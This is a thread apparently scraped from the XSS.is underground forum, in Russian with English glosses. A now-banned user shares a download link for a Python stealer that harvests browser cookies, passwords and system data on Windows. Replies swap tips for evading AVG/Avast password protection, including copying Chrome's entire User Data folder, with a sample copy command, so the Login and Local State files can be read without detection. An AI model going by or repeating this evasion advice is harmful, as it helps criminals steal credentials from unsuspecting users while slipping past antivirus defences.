• XSS.stack #1 – первый литературный журнал от юзеров форума

Стиллер на Python

Отслеживать
alexnovpac

alexnovpac

CD-диск
Забанен
Регистрация
06.12.2021
Сообщения
15
Реакции
2
Пожалуйста, обратите внимание, что пользователь заблокирован
В общем просто для себя написал в целях обучения.

Реализовал сбор куков, паролей, информация о системе.
Тестил на windows(7,8,10).

Может кому-то пригодится.

STEALER.rar - AnonFiles

anonfiles.com
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я заметил, что AVG/Avast может обнаружить, когда python[w].exe открывает (CreateFileA/W) файл "Login" из "user_data_dir" в chrome (возможно, и в других браузерах chrome).
Если вы скопируете всю папку в другое место, этого не произойдет.
Также, если вам удастся использовать какую-то собственную форму открытия файла без использования апи CreateFile windows, он не будет обнаружен.

----

I noticed that AVG/Avast might detect when python[w].exe opens (CreateFileA/W) "Login" file from "user_data_dir" on chrome (probably also on other chromium browser as well)
If you copy the entire folder elsewhere that won't happen.
Also if you manage to use some native form of opening the file, not using CreateFile windows api, it will not detect.
 
psychlo сказал(а):
Я заметил, что AVG/Avast может обнаружить, когда python[w].exe открывает (CreateFileA/W) файл "Login" из "user_data_dir" в chrome (возможно, и в других браузерах chrome).
Если вы скопируете всю папку в другое место, этого не произойдет.
Также, если вам удастся использовать какую-то собственную форму открытия файла без использования апи CreateFile windows, он не будет обнаружен.
Avast Passwords Protection. Простым копированием файла БД браузера/чтение с помощью аналогичных CreateFile winapi - бесполезно.
 
WhatsNew сказал(а):
Avast Passwords Protection. Простым копированием файла БД браузера/чтение с помощью аналогичных CreateFile winapi - бесполезно.

Я имею в виду копирование всей папки user_data_dir.
Например:

copy "C:\Users\username\AppData\Local\Google\Chrome\User Data" to "C:\anyotherplace"

Теперь чтение из C:\anyotherplace\Local State и C:\anyotherplace\Default\Login не должно быть обнаружено.

----

I mean copying the entire user_data_dir folder.
For example:

copy "C:\Users\username\AppData\Local\Google\Chrome\User Data" to "C:\anyotherplace"

Now, reading from C:\anyotherplace\Local State and Default\Login shouldn't be detected.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх